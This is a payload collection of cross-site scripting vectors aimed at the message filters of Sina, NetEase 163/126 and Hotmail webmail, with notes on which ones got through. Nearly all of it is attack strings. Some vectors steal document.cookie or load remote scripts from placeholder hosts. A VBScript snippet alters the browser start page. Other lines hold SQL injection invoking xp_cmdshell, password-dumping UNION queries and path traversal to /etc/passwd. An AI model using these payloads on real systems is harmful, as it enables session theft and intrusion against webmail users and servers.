
Webmail XSS payload collection — test vectors used against the message filters of Sina, NetEase (163/126) and Hotmail webmail; many entries are taken from RSnake's ha.ckers.org XSS cheat sheet. Encoding note: in this copy the characters `<`, `>` and `"` were lost in extraction and each appears as `&`, so every vector below must be reconstructed before use — e.g. `&script&alert('test')&/script&` is `<script>alert('test')</script>` and `&img src=/854.gif& onload=&alert(53)&&53` is `<img src="/854.gif" onload="alert(53)">53`. The `&` that begins a character reference such as `&#106;` or `&#x6A;` is genuine. Most vectors depend on legacy engines (IE `expression()`, `behavior:`, `dynsrc`, `vbscript:`; Netscape 4 `mocha:`/`livescript:`) and are tagged with the target browser where the original author noted it.
&script&alert(&dddd&)&script&
&script&alert('test')&/script&
----------------------------TOM-------------------------------------------------------------------
&img src=/854.gif& width=0 height=0 ononloadload=&alert(52)&&52
&img src=/854.gif& width=0 height=0 onload=&alert(53)&&53
&img src=/854.gif& width=0 height=0 /**/onload=&alert(54)&&54
&ba=&&script&alert(55);&/script&&55
&img/*****/src=# width=0 height=0 /***/onerror=alert(56)&56
&iframe/**/src=&57&/iframe&
&img src=/146.gif onreadystatechange=alert(58)&58
&image src=/146.gif onreadystatechange=alert(59)&59
&style onreadystatechange=alert(60)&60&/style&
&xml onreadystatechange=alert(61)&xxxx&/xml&61
&object type=image src=/146.gif onreadystatechange=alert(62)&62
&img type=image src=/146.gif onreadystatechange=alert(63)&63
&P STYLE=&behavior:url('#default#time2')& onEnd=alert(64)&64
&P STYLE=&behavior:url('#default#time2')& onBegin=alert(65)&65
&style&&img src=&&/style&&img src=x onerror=alert(66)//&&66
----------------------------------------------------------------------------------------------
&DIV STYLE=&background-image:\6C\61\73\69\3A\65\28\002F\73\002F\&&
&frameset onload=alert(1)&
&IMG SRC=&jav ascript:alert('XSS-1');&&
&IMG &&&&&SCRIPT&alert(&XSS-2&)&/SCRIPT&&&
Hello,80sec &&/xss style=&x:expression(alert(document.cookie))&&
&img src=/989.gif onLoad=alert(/xss-3/);&
&img src=&javascrip&#116&#58alert(/xss-4/)& width=100&
&img src=&#& style=&Xss:expression(alert(/xss-5/));&&
input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
&/style& &
&input type=&text&&
a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
&marquee style=&background-color:red& onstart=&alert('monyer')& &asdf&/marquee&
&div&\n&marquee style=\&BACKGROUND-COLOR:\& onstart=&alert('monyer')&\n&asdf&\/marquee&&\/div&
&img src=&marquee style=&background-color:red& onstart=&alert('monyer')& &onerror=alert(/XSS-6/)&&&/marquee&
&img src=&marquee style=&background-color:red& onstart=&alert('monyer')& &onerror=onerror=alert(/XSS-7/)&&&marquee&
&img src=&marquee style=&background-color:red& onstart=&alert(/&/&) &onerror=onerror=alert(/XSS-8/)&&&marquee&&
Sina webmail: this vector appears to be only one closing character short (a lost `"`/`>`, shown here as `&`) of breaking out of the attribute — the filter left it unclosed.
&img src=&&marquee style=&background-color:red& onstart=&alert(&(&) &onerror=onerror=alert(/XSS-9/)&&&marquee&
&img src=& http://xss.jpg&&&; onerror=alert('onerror=')&
Sina webmail: this vector is rejected by the filter and cannot be inserted.
&img src=& http://xss.jpg& onerror=alert('onerror=')&
&img src=& http://xss.jpg& style=\&BACKGROUND-COLOR:\& onerror=alert('onerror=')&
&DIV style=&xss:ex/*ss*/pression(alert('/ycosxhack'))&&&/DIV&
&img src=& http://xss.jpg& onerror=alert('XSS-10')&
&IMG onerror=&alert('XSS-11')& src=& http://xss.jpg&&
&img src=http onerror=alert(/XSS-12/)&
&div style=&background-color:red& onmouseenter=&alert('monyer')&&123456&/div&
&HTML&&HEAD&
&P&参加&/P&
&div id=&nini& style=&display:none&&window.xx=2;var f=document.createElement('script');f.src='http://www./test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)&/div&&style&&!--a{font-size:14font-family:arial,verdana,sans-&/style&&div&;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(window.xx!=2?eval(nini.innerHTML):1);&/div&&style&}--&&/style&&a&&/a&&img width=&1& height=&1& src=&http://www./test.js&&
&/BODY&&/HTML&
Latest NetEase (163/126 webmail) XSS vector:
&script defer=&defer&&var a,b,c,d,e;a=&http:&;b=&//&;c=&www&;d=&.baidu&;e=&.com&;window.open(a+b+c+d+e,&&,&toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500&);&/script&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&behavior:url(#default#time2)& attributename=innerhtml values=&img/src=`.`style=`display:none`onerror=eval(llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&behavior:url(#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*/XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*/XMLNS:t/*t*/=/*t*/&urn:schemas-microsoft-com:time&/*t*/&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*///fuckyou///\/XMLNS:t/*t*/=/*t*/&urn:schemas-microsoft-com:time&/*t*/&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`onerror.eval\/\/\/\/\/\/\/\/\/\/\/\\/\/\/\/\////////////////////*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div style=width:1filter:glow onfilterchange=alert(1)&x
&!--&img src=&--&&img src=x onerror=alert(1)//&&
&comment&&img src=&&/comment&&img src=x onerror=alert(1)//&&
&style&&img src=&&/style&&img src=x onerror=alert(1)//&&
&x '=&foo&&&x foo='&&img src=x onerror=alert(1)//'&
&a href=&javascript#[code]&&
&img src=&javascript:[code]&&
&img dynsrc=&[code]&& [IE]
&input type=&image& dynsrc=&[code]&& [IE]
&bgsound src=&[code]&& [IE]
&&script&[code]&/script&
&{[code]} [Netscape 4]
&img src=&{[code]};&
&link rel=&stylesheet& href=&[code]&&
&iframe src=&vbscript:[code]&& [IE]
&img src=&mocha:[code]&& [Netscape 4]
&img src=&livescript:[code]&& [Netscape 4]
&div style=&behavior:url([link to code])&& [IE]
&div style=&binding:url([link to code])&& [Mozilla]
&div style=&width:expression([code]);&& [IE]
&object classid=&clsid:...& codebase=&javascript:[code]&& [IE]
[\xC0][\xBC]script&[code][\xC0][\xBC]/script& [UTF-8; IE, Opera]
& &&a href=&javascript#[code]&&
& &&div onmouseover=&[code]&&
& &&img src=&javascript:[code]&&
& &&img dynsrc=&javascript:[code]&& [IE]
& &&input type=&image& dynsrc=&javascript:[code]&& [IE]
& &&bgsound src=&javascript:[code]&& [IE]
& &&&script&[code]&/script&
& &&{[code]}; [N4]
& &&img src=&{[code]};& [N4]
& &&link rel=&stylesheet& href=&javascript:[code]&&
& &&iframe src=&vbscript:[code]&& [IE]
& &&img src=&mocha:[code]&& [N4]
& &&img src=&livescript:[code]&& [N4]
& &&a href=&about:&script&[code]&/script&&&
& &&meta http-equiv=&refresh& content=&0;url=javascript:[code]&&
& &&body onload=&[code]&&
& &&div style=&background-image: url(javascript:[code]);&&
& &&div style=&behaviour: url([link to code]);&& [IE]
& &&div style=&binding: url([link to code]);&& [Mozilla]
& &&div style=&width: expression([code]);&& [IE]
& &&style type=&text/javascript&&[code]&/style& [N4]
& &&object classid=&clsid:...& codebase=&javascript:[code]&& [IE]
& &&style&&!--&/style&&script&[code]//--&&/script&
& &&![CDATA[&!--]]&&script&[code]//--&&/script&
& &&!-- -- --&&script&[code]&/script&&!-- -- --&
& &&script&[code]&/script&
& &&img src=&blah&onmouseover=&[code]&&
& &&img src=&blah&& onmouseover=&[code]&&
& &&xml src=&javascript:[code]&&
& &&xml id=&X&&&a&&b&&script&[code]&/script&;&/b&&/a&&/xml&
& &&div datafld=&b& dataformatas=&html& datasrc=&#X&&&/div&
& &[\xC0][\xBC]script&[code][\xC0][\xBC]/script& [UTF-8; IE, Opera]
&IFRAME SRC=&/&&&/IFRAME&
&script&alert('dddd')&script&
&style&*{x:expression(if(x!=1){alert(1);x=1;})}&/style&
&img lowsrc= &javascript:alert('xss-13')&&
img = new Image(); img.src = &http://127.0.0.1/cookie.?cookie=&+document.cookie;img.width=0;img.height=0
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-14&)';&/STYLE&
&img src=&#& style=&Xss:expression(alert('xss-15'));&&&
&img src=&javascript:alert(/xss-16/)&&&
&table background=&javascript:alert(/xss-17/)&&&/table&
&img src=&vbscript:msgbox(&a&)&&
&img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x77&#x77&#x77&#x2E&#x68&#x61&#x63&#x6B&#x6D&#x2E&#x63&#x6F&#x6D&#x27&#x29&
&img src=j	ava	script:wi	ndow.op	en('')&
&img src=javascript:document.write('&Iframe%20src=/jc123%20width=500%20height=550%3E&/iframe%3E')&&
&img src=javascript:document.write('%3CIframe%20src=/jc123%20width=500%20height=550%3E%3C/iframe%3E')&
&img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x64ocument&#x2ewrite&#x28&#x27&#x3cIframe%20src=/jc123%20width=500%20height=550%3E&#x3c/iframe%3E')&
&script&window.location=('/')&/script&
&img src=&/BLOG/javascript:document.write&('&Iframe%20src=%20width=500%20height=550%3E&/iframe%3E')&
&img src=j avascript:document.write('%3CIframe%20src=%20width=500%20height=550%3E%3C/iframe%3E')&
&img src=&/BLOG/&&;#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69& #x70&#x74&#x3A&#x64ocument&#x2ewrite&#x28&#x27& #x3cIframe%20src=%20width=500%20height=550%3E&#x3c/iframe% 3E')&
&body onload='window.open(&&)'&
&body onload='window.open(&http://baidu.com&)'&
&meta http-equiv=&refresh& content=&0;url=&&
&img dynsrc=javascript:alert(&hi,163&)&
&img dynsrc=javascript:window.location.href='/getcookie.asp?msg='+document.cookie&。
&marquee onstart=&alert(/xss-18/)&&.&/marquee&
Hotmail XSS vector that was filtered (patched) a while ago; kept for reference:
&font color=&ffffff&& &div id=&jmp& style=&display:none&&nop&/div&&div id=&ly& style=&display:none&&function ok(){return true};window.onerror=ok&/div&&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&&div id=&tap& title=&&& style=&display:none&&&/div&&div id=&tep& title=&&& style=&display:none&&&/div&&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&&/font&
&font color=&ffffff&&
&div id=&jmp& style=&display:none&&nop&/div&
&div id=&ly& style=&display:none&&
function ok()
return true
window.onerror=ok&/div&
&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&
&div id=&tap& title=&&& style=&display:none&&&/div&
&div id=&tep& title=&&& style=&display:none&&&/div&
&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&
&STYLE type=text/css&BODY {
BACKGROUND-IMAGE: url(expression:(javascript:alert('xss-19');); ); MARGIN: 0 BACKGROUND-COLOR: #a00000
FONT-SIZE: 12 COLOR: # LINE-HEIGHT: 20px
FONT-SIZE: 12 COLOR: #000000; TEXT-DECORATION: none
FONT-SIZE: 12 COLOR: #ffff00; TEXT-DECORATION: underline
&style&BR{top:rgb('88',80,'180);top:rgb(') !important height:exPrEsSiOn((window.rrr==123)?xxx=8:(eval(code.title)==20088) || (rrr=123))}',80,'180);}&/style&
&div id=&xxx& style=&DISPLAY: none& title=&try{window['on'+'error']=function(){};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}&&.&/div&&div style=&DISPLAY: none&&&img lang=&HTML& id=&inner& title=&&img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#&& width=0 src=&http://#& style=&background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.//)`&&&/div&&
&IMG SRC=&javascript:alert(&XSS-20&);&&
&IMG SRC=javascript:alert(&XSS-21&)&
&IMG SRC=&javascript:alert(String.fromCharCode(88,83,83))&&
&IMG SRC=&jav ascript:alert(&XSS-22&);&&
&SCRIPT/XSS SRC=&/xss.js&&&/SCRIPT&
&&SCRIPT&alert(&XSS-23&);//&&/SCRIPT&
&iframe src=/scriptlet.html &
&INPUT TYPE=&IMAGE& SRC=&javascript:alert(&XSS-24&);&&
&INPUT TYPE=&IMAGE& SRC=&javascript:alert('XSS-24');&&
&BODY BACKGROUND=&javascript:alert(&XSS-25&)&&
&BODY ONLOAD=alert(document.cookie)&
&BODY onload!#$%&()*~+-_.,:;?@[/|&]^`=alert(&XSS-26&)&
&IMG DYNSRC=&javascript:alert(&XSS-27&)&&
&IMG DYNSRC=&javascript:alert(&XSS-28&)&&
&BR SIZE=&&{alert(&XSS-29&)}&&
&IMG SRC=&vbscript:msgbox(&XSS-30&)&&
&TABLE BACKGROUND=&javascript:alert(&XSS-31&)&&
&DIV STYLE=&width: expression(alert(&XSS-32&));&&
&DIV STYLE=&background-image: url(javascript:alert(&XSS-33&))&&
&STYLE TYPE=&text/javascript&&alert(&XSS-34&);&/STYLE&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert(&XSS-35&)&)}&/STYLE&
&?=&&SCRIPT&alert(&XSS-36&)&/SCRIPT&&?&
&A HREF=&javascript:document.location=&/&&&XSS&/A&
&IMG SRC=javascript:alert(&XSS-37&)&
&EMBED SRC=&http://ha.ckers.org/xss.swf& AllowScriptAccess=&always&&&/EMBED&
b=&URL(&&&;
c=&javascript:&;
d=&alert(&XSS-38&);&&)&;
eval(a+b+c+d);
&img src=&url.gif& dynsrc=&url.avi&&
&bgsound src=&sound.wav& loop=3&
&img src=&SAMPLE-S.GIF& dynsrc=&SAMPLE-S.AVI& start=mouseover&
&script&window.location=&&&/script&&
&script language=Script&alert(&终于有人上当的了!&)&/script&
&TABLE background=javascript:alert(/xss-39/)&
&iframe src=javascript:alert(/xss-40/)&
&a href=javascript:alert(/xss-41/)&
&DIV STYLE=&background-image: url(javascript:alert('XSS-42'))&&
&DIV STYLE=&width: expression(alert('XSS-43'));&&
&DIV STYLE=&width: exp/*xss*/ression(alert('XSS-44'));&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-45&)';&/STYLE&
&script&open(/*
*/&http://127&/*
*/+&.0.0.1/&/*
*/)&/script&
&script&/*
*/String/*
*/fromCharCode/*
*/111,99,/*
*/......./*
*/&/script&
&script language=&VBScript&&
Set RegWsh = CreateObject(&WScript.Shell&)
RegWsh.RegWrite &HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&, &&&
&a href=&javascript:alert('xss-46');&&Click here&/a&
&form method=&post& action=&javascript:alert('xss-47');&&
&input type=&submit& value=&Submit&&
&img src=&javascript:alert('xss-48');&&&!-- only works in IE --&
&object type=&text/x-scriptlet& data=&&&&/object&&
&img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x77&#x77&#x77&#x2E&#x68&#x61&#x63&#x6B&#x6D&#x2E&#x63&#x6F&#x6D&#x27&#x29&
&style type=&text/css&&
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
&font color=&ffffff&& &div id=&jmp& style=&display:none&&nop&/div&&div id=&ly& style=&display:none&&function ok(){return true};window.onerror=ok&/div&&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&&div id=&tap& title=&&& style=&display:none&&&/div&&div id=&tep& title=&&& style=&display:none&&&/div&&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&&/font&
&img src=javascript:document.write('%3CIframe%20src=%20width=500%20height=550%3E%3C/iframe%3E')&
Xsstc { background-image: url('about:blank#Hello%20World'); }&
Xsstc.exec('/test.css', showResponse)
&font color=&ffffff&&&
& & &&div id=&jmp& style=&display:none&&nop&/div&
& & &&div id=&ly& style=&display:none&& & & &// these hidden DIVs store the exploit in fragments, reassembled below
& & & & &function ok(){return true};
& & & & &window.onerror=ok
& & &&/div&
& & &&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&
& & &&div id=&tap& title=&&& style=&display:none&&&/div&
& & &&div id=&tep& title=&&& style=&display:none&&&/div&
& & &&style&
&// The exploit starts here: a conditional expression inside CSS expression() carries the payload. It reads the fragments stored in the DIVs above and concatenates them into the final injected script markup, emitted via document.write.
& & & & &div{background-image:expression(
& & & & & & &javascript:1?document.write(
& & & & & & & & & & &EC_tip.title+';top:'+EC_tap.title+'/a'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+'script id=nop'+
& & & & & & & & & & &EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+
& & & & & & & & & & &'script src=http://localhost/1.js'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+'/script'+
& & & & & & & & & & &EC_tep.title)
& & & & & & & & & & &:1=1);
& & & & & & & & &}
& & & & &&/style&
&img src=&java script:alert(/xss-49/)& width=0&&
&img src=&#& onerror=alert(/xss-50/) width=0&&
&a href=&replace.htm#state=0&url=/&script&alert('xeye')&/script&&&xeye&/a&
&link type=&text/css& rel=&stylesheet& href=& & /&
&body{background: url(javascript:alert(document.cookie); ) }&/body&
&script/hello&alert(/xss-51/)&/script/world&
&img/ssssss/src=&javascript:alert(/1/)&&
&IMG SRC=`javascript:alert(/2/)`&
&IMG/src/SRC=`SRC//=//javascript:alert(/2/)`&
&IMG/src=javascript:alert(/2/)`/SRC=`;SRC=javascript:alert(/2/)&
&style&body{xss:expression(alert(/xss-52/))}&/style&
&style&@import 'javascript:alert(/xss-53/)'; &/style&
&script&alert(&XSS-54&)&/script&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-55&)';&/STYLE&
&style&@\im\port'\ja\vasc\ript:alert()';&/style&
&style&@\im\po\rt'\0ja\0va\0sc\0ri\0pt:alert()';&/style&
&STYLE&@\0im\port'\0ja\vasc\ript:alert(&XSS-56&)';&/STYLE&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS-57')&)}&/STYLE&
&STYLE TYPE=&text/css&&.XSS{background-image:url(&javascript:alert('XSS-58')&);}&/STYLE&&A CLASS=XSS&&/A&&
&marquee onstart=&alert(/2/)&&.&/marquee&
&div style=&xss:ex/**/pre/**/ssion(alert('xss-59'))&&
&div style=&xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))&&
&DIV STYLE=&width: expression(alert('XSS-60'));&&
&div style=&background:url('javascript:alert(1)')&&&
&DIV STYLE=&background-image: url(javascript:alert('XSS-61'))&&
&div id=&mycode& expr=&alert('hah!')& style=&background:url('javascript:eval(document.all.mycode.expr)')&&
&div id=&mycode& expr=&alert('hah!')& style=&background:url('java\script:eval(document.all.mycode.expr)')&&&
&BODY BACKGROUND=&javascript:alert('XSS-62')&&
&BODY ONLOAD=alert('XSS-63')&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS-64');&&
&FRAMESET&&FRAME src=javascript:alert('XSS-65')&&/FRAME&&/FRAMESET&
&TABLE BACKGROUND=&javascript:alert('XSS-66')&&
&iframe src=&vbscript:alert()&&
&IFRAME src=javascript:alert('XSS-67')&&/IFRAME&
&IMG STYLE='xss:expre\ssion(alert(&XSS-68&))'&
&img src=&#& style=&Xss:expression(alert('xss-69'));&&
&IMG src='vbscript:msgbox(&XSS-70&)'&
&IMG DYNsrc=&javascript:alert('XSS-71')&&&
&IMG LOWsrc=&javascript:alert('XSS-72')&&
&img src=&javascript:alert('3');&&
&img src=/892.jpg& onerror=alert('4')&
&img src=&&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59&&
&IMG src=&#08&#09&#02&#07&#04&#09&#03&#00041&
&img src=&&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&#x3b&& =&img src=&javascript:alert('5');&&
&img STYLE=&background-image: url(javascript:alert('6'))&&
javascript:document.write(&&script src=/1.js&&/script&&)&
&img src=&javascript:alert(/10/)&&
&img src=&#& onerror=alert(/11/) &
&IMG SRC=&JAVA&115;CRIPT:ALERT('12');&&&/IMG&
&img src=&javascript:alert('XSS-73')&&
&IMG src=&jav	ascript:alert('XSS-74');&&&
&IMG src=&jav
ascript:alert('XSS-75');&&&
&IMG src=&jav
ascript:alert('XSS-76');&&&
javascript:document.write('&scri'+'pt src=/1.txt&'+'&/scri'+'pt&');
RSnake's classic XSS vectors (ha.ckers.org cheat sheet) — test each of them:
[float=expression(alert('xss-77'))]11[/float]
&TABLE BACKGROUND=javascript:alert(/xss-78/)&
163 (NetEase) webmail XSS: &img src=&jav as cript:alert('XSS-79');&&
126 (NetEase) webmail: &img src=&&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59&&
&img src=&javascript:window.open('/msg.asp?msg='+document.cookie);&&
xss.jpg& onerror=window.open('/msg.asp?msg='+document.cookie) width=0&
&img src=&blah&onmouseover=alert()&
&img onmouseover=alert()&&/img&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-80&)';&/STYLE&&
Whitespace bypasses: a tab (`&#9`), line feed (`&#10`) or carriage return (`&#13`) inserted inside `javascript:` (see the `jav<TAB>ascript` / `jav<LF>ascript` variants above) to evade keyword filters.
&img src=&abc&& onmouseover=&[code]&&
&SCRIPT a=&&& SRC=&xss.js&&&/SCRIPT&
&script&/*
*/(&zs&)/*
*/&/script&
&table&&tr&&td background=&javascript:alert(/xss-81/)&&&/tr&&/table&
&#104&#116&#116&#112&#58&#47&#47&#120&#115&#115&#46&#106&#112&#103&#34&#32&#111&#110&#101&#114&#114&#111&#114&#61&#97&#108&#101&#114&#116&#40&#39&#52&#39&#41&#62
&img onmouseover=alert()&&/img&
&STYLE&@im\port'\ja\vasc\ript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))';&/STYLE&&
&style&@import url(http://xxx.xxx.xxx/xss.css); &/style&
xss:expression(
if(!window.x)// run once only (same window.x guard as the expression() vectors below)
{alert('xss-82');
window.x=1;
&style & type= &text/css & & media= &all & & title= &Default &&&
.mycss & {&
wuxinlangman:expression(onmousemove=function(){&
this.style.color= &blue &;&
},onmouseout=function(){&
this.style.color= &red &;&
& & &/style&&
& & &body & id= &wuxinlangman &&&
&input & class= &mycss & & value= &wuxinlangman &/&&
&style type=&text/css&&
a {star : expression_r(onfocus=this.blur)}
&a href=&link1.htm&&link1&/a&
&a href=&link2.htm&&link2&/a&
&a href=&link3.htm&&link3&/a&
&style&body{xss:expr/*/*/expression/expression*/ession(alert(/xss-83/))}&/style&
&STYLE&body{xss:exprexpression/expression*/ession(alert(/xss-84/))}&/STYLE&
&style&body{xss:expr/*/*//*/ession(alert(/xss-85/))}&/style&
&STYLE&body{xss:expr/*/ession(alert(/xss-86/))}&/STYLE&
&style&body{xss:expr/*/*/ession(alert(/xss-87/))}&/style&
&STYLE&body{xss:exp_ression(alert(/xss-88/))}&/STYLE&
&style&body{xss:expr/*//*/ession(alert(/xss-89/))}&/style&
&STYLE&body{xss:exp_ression(alert(/xss-90/))}&/STYLE&
&style&body{xss:expr/*///*////*/ession(alert(/xss-91/))}&/style&
&STYLE&body{xss:expr///*/ession(alert(/xss-92/))}&/STYLE&
&style&body{xss:expr/*///**////*/ession(alert(/xss-93/))}&/style&
&STYLE&body{xss:expr///*/ession(alert(/xss-94/))}&/STYLE&
&style&body{xss:expr/*///******////*/ession(alert(/xss-95/))}&/style&
'&&script&alert(document.cookie)&/script&&
='&&script&alert(document.cookie)&/script&&
&script&alert(document.cookie)&/script&&
&script&alert(vulnerable)&/script&&
%3Cscript%3Ealert('XSS-96')%3C/script%3E&
&script&alert('XSS-97')&/script&&
&img src=&javascript:alert('XSS-98')&&&
%0a%0a&script&alert(\&Vulnerable\&)&/script&.&
%22%3cscript%3ealert(%22xss%22)%3c/script%3e&
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini&
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html&
&script&alert('Vulnerable');&/script&gt&
&script&alert('Vulnerable')&/script&&
?sql_debug=1&
a%5c.aspx&
a.jsp/&script&alert('Vulnerable')&/script&&
a?&script&alert('Vulnerable')&/script&&
&&&script&alert('Vulnerable')&/script&&
';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&
%3Cscript%3Ealert(document. domain);%3C/script%3E&&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=&
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=&
../../../../../../../../etc/passwd&
..\..\..\..\..\..\..\..\windows\system.ini&
\..\..\..\..\..\..\..\..\windows\system.ini&
'';!--&&XSS&=&{()}&
&IMG SRC=&javascript:alert('XSS-99');&&&
&IMG SRC=javascript:alert('XSS-100')&&
&IMG SRC=JaVaScRiPt:alert('XSS-101')&&
&IMG SRC=JaVaScRiPt:alert(&XSS&)&&
&IMG SRC=javascript:alert('XSS'&#41&&
&IMG SRC=&#08&#09&#02&#07&#04&#09&#03&#00041&&
&IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&&
&IMG SRC=&jav	ascript:alert('XSS-102');&&&
&IMG SRC=&jav
ascript:alert('XSS-103');&&&
&IMG SRC=&jav
ascript:alert('XSS');&&&
&&IMG SRC=java\0script:alert(\&XSS\&)&&;' & out&
&IMG SRC=& javascript:alert('XSS');&&&
&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&&
&BODY BACKGROUND=&javascript:alert('XSS')&&&
&BODY ONLOAD=alert('XSS')&&
&IMG DYNSRC=&javascript:alert('XSS')&&&
&IMG LOWSRC=&javascript:alert('XSS')&&&
